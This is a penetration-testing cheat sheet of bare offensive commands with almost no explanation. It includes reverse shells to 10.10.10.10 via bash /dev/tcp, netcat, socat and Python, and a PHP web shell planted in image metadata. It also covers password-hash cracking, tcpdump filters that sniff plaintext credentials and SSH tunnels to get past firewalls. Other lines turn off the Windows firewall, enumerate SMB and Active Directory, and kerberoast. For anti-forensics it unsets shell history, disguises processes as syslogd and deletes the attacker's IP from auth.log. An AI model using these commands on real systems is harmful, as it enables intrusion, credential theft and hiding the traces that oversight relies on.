Pentest Cheatsheet

find / -user $(whoami) 2>/dev/null | egrep -v '(/proc)'

find / -writeable 2>/dev/null | egrep -v '(/proc|/run|/dev)'

find / -readable 2>/dev/null | egrep '(\.key$|\.pub$|\.bak$|\.crt$|\.ca$|^id_rsa)'

bash -i >& /dev/tcp/10.10.10.10/444 0>&1

nc -e /bin/bash 10.10.10.10 444
nc -e /bin.sh 10.10.10.10 444

socat file:`tty`,raw,echo=0 tcp-listen:444 #listener
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.10:444 #payload

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo
F+G+ENTER
export TERM=xterm

stty -a
stty cols rows

for i in $(ls $(pwd)/*); do dpkg --search $i 1>/dev/null; done

exiv2 -c'A "<?php system($_REQUEST['cmd']);?>"!' backdoor.jpeg
exiftool “-comment<=back.php” back.png

ssh2john id_rsa > id_rsa.hash
john --wordlist=wordlist.txt id_rsa.hash

unshadow passwd.hashes shadow.hashes > unshadowed_passwords.txt
john --wordlist=wordlist.txt passwords.txt

wfuzz  -w /usr/share/wordlists/dirb/common.txt --hc 404,500 -u http://10.10.10.168:8080/

unset HISTFILE

kill -9 $$

exec -a syslogd <command here>

ssh -o UserKnownHostsFile=/dev/null -T user@host.org "bash -i"

# bypass local firewalls or IP filtering
# connect to localhost:31337 and get connected to 1.2.4.3:80 appearing as user@host.org
ssh -g -L31337:1.2.3.4:80 user@host.org

# access private machine
# connect to host.org:31338 get forwarded to 10.10.10.10:80 via localhost
ssh -o ExitOnForwardFailure=yes -g -R31338:10.10.10.10:80 user@host.org

# reverse dynamic forwarding
# configure host.org:1080 as SOCKS4/5 proxy and connect to any internal address/port where the system SSH was executed from has access to
ssh -R 1080 user@host.org

tcpdump -n "tcp[tcpflags] == tcp-syn"

tcpdump -i eth0 'port 80'
tcpdump -i eth0 [udp | proto 17]
tcpdump -vv -x -X -s 1500 -i eth0 'port 80'
tcpdump -i eth0 host 10.10.10.10
tcpdump -i eth0 dst 10.10.10.10
tcpdump -i eth0 -n icmp
tcpdump dst port 123
tcpdump port http or port ftp or port smtp or port imap or port pop3 or port telnet -l -A | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '

cd /dev/shm
grep -v '10\.10\.10\.10' /var/log/auth.log >a.log; cat a.log >/var/log/auth.log; rm -f a.log

smbclient -L //10.10.10.10 #list shares
smbclient -U ''
smbmap -H 10.10.10.10 #list shares
smbmap -R [share] -H 10.10.10.10 #list contents of share
smbmap -d domain -u user -p password -H 10.10.10.10 #login with user
crackmapexec smb 10.10.10.10 --shares -u '' -p ''

gpp-decrypt hash

GetADUsers.py -all domain/user -dc-ip 10.10.10.10
GetUserSPN.py -request[-user] [user] -dc-ip 10.10.10.10 domain/user #kerberoast

rpcclient 10.10.10.10
rpcclient 10.10.10.10 -U ''
enumdomusers

kerbrute userenum --dc 10.10.10.10 -d domain -o outfile.out users.lst

runas /netonly /user:domain\username cmd

psexec.py domain/user@10.10.10.10

execute -f cmd.exe -c -H
shell
netsh firewall show opmode
netsh advfirewall set allprofiles state off
getsystem

Get-DomainUser -LDAPFilter "(userpassword=*)" | Measure-Object | Select-Object Count
Get-DomainUser -LDAPFilter "(userpassword=*)" -Properties samaccountname,userpassword | % { [pscustomobject]@{samaccountname=$_.samaccountname; userpassword=[System.Text.Encoding]::ASCII.GetString($_.userpassword)} }